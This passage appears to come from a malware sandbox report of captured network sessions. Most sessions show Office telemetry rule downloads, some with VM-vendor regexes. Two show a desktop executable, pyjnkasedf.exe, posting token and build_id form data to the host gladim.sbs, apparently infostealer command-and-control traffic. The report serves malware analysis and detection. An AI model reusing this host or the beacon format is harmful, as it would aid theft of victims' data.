                                                                                                                                                                                                                                                      2024-11-30 21:38:17 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120620" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      23192.168.2.104972713.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:17 UTC192OUTGET /rules/rule120621v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:17 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 415
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:03 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BA41997E3"
                                                                                                                                                                                                                                                      x-ms-request-id: 9a3d38b7-801e-00ac-4db3-42fd65000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213817Z-174f7845968xr5c2hC1EWRd0hn0000000kw00000000084mx
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:18 UTC415INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 31 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 56 76 5d 5b 4d 6d 5d 5b 57 77 5d 5b 41 61 5d 5b 52 72 5d 5b 45 65 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120621" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120619" /> <SR T="2" R="([Vv][Mm][Ww][Aa][Rr][Ee])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      24192.168.2.104972813.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:17 UTC192OUTGET /rules/rule120622v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:17 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 477
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB8CEAC16"
                                                                                                                                                                                                                                                      x-ms-request-id: e9babc56-001e-0049-5291-3f5bd5000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213817Z-174f78459688l8rvhC1EWRtzr00000000em000000000a3sg
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:18 UTC477INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120622" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      25192.168.2.104972913.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:17 UTC192OUTGET /rules/rule120623v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:17 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 464
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:43 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B97FB6C3C"
                                                                                                                                                                                                                                                      x-ms-request-id: a99e6065-701e-006f-4d91-3fafc4000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213817Z-174f7845968vqt9xhC1EWRgten0000001250000000000nkr
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:18 UTC464INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 47 67 5d 5b 49 69 5d 5b 47 67 5d 5b 41 61 5d 5b 42 62 5d 5b 59 79 5d 5b 54 74 5d 5b 45 65 5d 20 5b 54 74 5d 5b 45 65 5d 5b 43 63 5d 5b 48 68 5d 5b 4e 6e 5d 5b 4f 6f 5d 5b 4c 6c 5d 5b 4f 6f 5d 5b 47 67 5d 5b 59 79 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120623" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120621" /> <SR T="2" R="([Gg][Ii][Gg][Aa][Bb][Yy][Tt][Ee] [Tt][Ee][Cc][Hh][Nn][Oo][Ll][Oo][Gg][Yy])"> <S T="1" F="1" M="Ignor


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      26192.168.2.104973013.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:17 UTC192OUTGET /rules/rule120624v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:18 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:18 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 494
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582BB7010D66"
                                                                                                                                                                                                                                                      x-ms-request-id: 3fc8b732-401e-0083-1091-3f075c000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213818Z-174f7845968xr5c2hC1EWRd0hn0000000kyg000000001ts2
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:18 UTC494INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      27192.168.2.104973194.130.210.714437496C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:18 UTC318OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HCAEGCBFHJDGCBFHDAFB
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                      Host: gladim.sbs
                                                                                                                                                                                                                                                      Content-Length: 5553
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      2024-11-30 21:38:18 UTC5553OUTData Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 31 64 61 39 61 65 61 38 30 61 37 38 33 35 61 64 65 33 31 37 64 37 66 65 38 61 63 61 35 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 65 30 30 61 61 35 30 32 65 37 39 61 35 62 36 63 35 34 62 66 63 36 61 33 32 33 31 61 33 62 35 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 47 43 42 46 48 4a 44 47 43 42 46 48 44 41 46 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                      Data Ascii: ------HCAEGCBFHJDGCBFHDAFBContent-Disposition: form-data; name="token"851da9aea80a7835ade317d7fe8aca55------HCAEGCBFHJDGCBFHDAFBContent-Disposition: form-data; name="build_id"5e00aa502e79a5b6c54bfc6a3231a3b5------HCAEGCBFHJDGCBFHDAFBCont
                                                                                                                                                                                                                                                      2024-11-30 21:38:19 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:19 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-11-30 21:38:19 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      28192.168.2.104973213.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:19 UTC192OUTGET /rules/rule120625v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:19 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 419
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:42 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B9748630E"
                                                                                                                                                                                                                                                      x-ms-request-id: 7e299a61-c01e-0049-0c07-41ac27000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213819Z-174f7845968qj8jrhC1EWRh41s00000011w000000000ft5t
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:20 UTC419INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 46 66 5d 5b 55 75 5d 5b 4a 6a 5d 5b 49 69 5d 5b 54 74 5d 5b 53 73 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      29192.168.2.104973313.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:19 UTC192OUTGET /rules/rule120626v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:20 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 472
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B9DACDF62"
                                                                                                                                                                                                                                                      x-ms-request-id: 80135fc2-701e-001e-3d45-40f5e6000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213820Z-174f7845968px8v7hC1EWR08ng000000127g00000000bn33
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
                                                                                                                                                                                                                                                      2024-11-30 21:38:20 UTC472INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                                                                                                                                                                                                      Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120626" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                      30192.168.2.104973694.130.210.714437496C:\Users\user\Desktop\pyjnkasedf.exe
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:19 UTC317OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----AEBKECFCFBGCAAKEGIJD
                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.6 Safari/605.1.15 Ddg/17.6
                                                                                                                                                                                                                                                      Host: gladim.sbs
                                                                                                                                                                                                                                                      Content-Length: 489
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                      2024-11-30 21:38:19 UTC489OUTData Raw: 2d 2d 2d 2d 2d 2d 41 45 42 4b 45 43 46 43 46 42 47 43 41 41 4b 45 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 38 35 31 64 61 39 61 65 61 38 30 61 37 38 33 35 61 64 65 33 31 37 64 37 66 65 38 61 63 61 35 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 45 43 46 43 46 42 47 43 41 41 4b 45 47 49 4a 44 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 35 65 30 30 61 61 35 30 32 65 37 39 61 35 62 36 63 35 34 62 66 63 36 61 33 32 33 31 61 33 62 35 0d 0a 2d 2d 2d 2d 2d 2d 41 45 42 4b 45 43 46 43 46 42 47 43 41 41 4b 45 47 49 4a 44 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                      Data Ascii: ------AEBKECFCFBGCAAKEGIJDContent-Disposition: form-data; name="token"851da9aea80a7835ade317d7fe8aca55------AEBKECFCFBGCAAKEGIJDContent-Disposition: form-data; name="build_id"5e00aa502e79a5b6c54bfc6a3231a3b5------AEBKECFCFBGCAAKEGIJDCont
                                                                                                                                                                                                                                                      2024-11-30 21:38:20 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:20 GMT
                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      2024-11-30 21:38:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                      Data Ascii: 0


                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                      31192.168.2.104973513.107.246.63443
                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                      2024-11-30 21:38:19 UTC192OUTGET /rules/rule120628v0s19.xml HTTP/1.1
                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                      Accept-Encoding: gzip
                                                                                                                                                                                                                                                      User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                                                                                                                                                                                                      Host: otelrules.azureedge.net
                                                                                                                                                                                                                                                      2024-11-30 21:38:20 UTC470INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                      Date: Sat, 30 Nov 2024 21:38:20 GMT
                                                                                                                                                                                                                                                      Content-Type: text/xml
                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                      Cache-Control: public, max-age=604800, immutable
                                                                                                                                                                                                                                                      Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT
                                                                                                                                                                                                                                                      ETag: "0x8DC582B9C8E04C8"
                                                                                                                                                                                                                                                      x-ms-request-id: f5817373-b01e-003e-3591-3f8e41000000
                                                                                                                                                                                                                                                      x-ms-version: 2018-03-28
                                                                                                                                                                                                                                                      x-azure-ref: 20241130T213820Z-174f7845968cdxdrhC1EWRg0en00000011ug00000000n73r
                                                                                                                                                                                                                                                      x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                                                                      X-Cache: TCP_HIT
                                                                                                                                                                                                                                                      Accept-Ranges: bytes
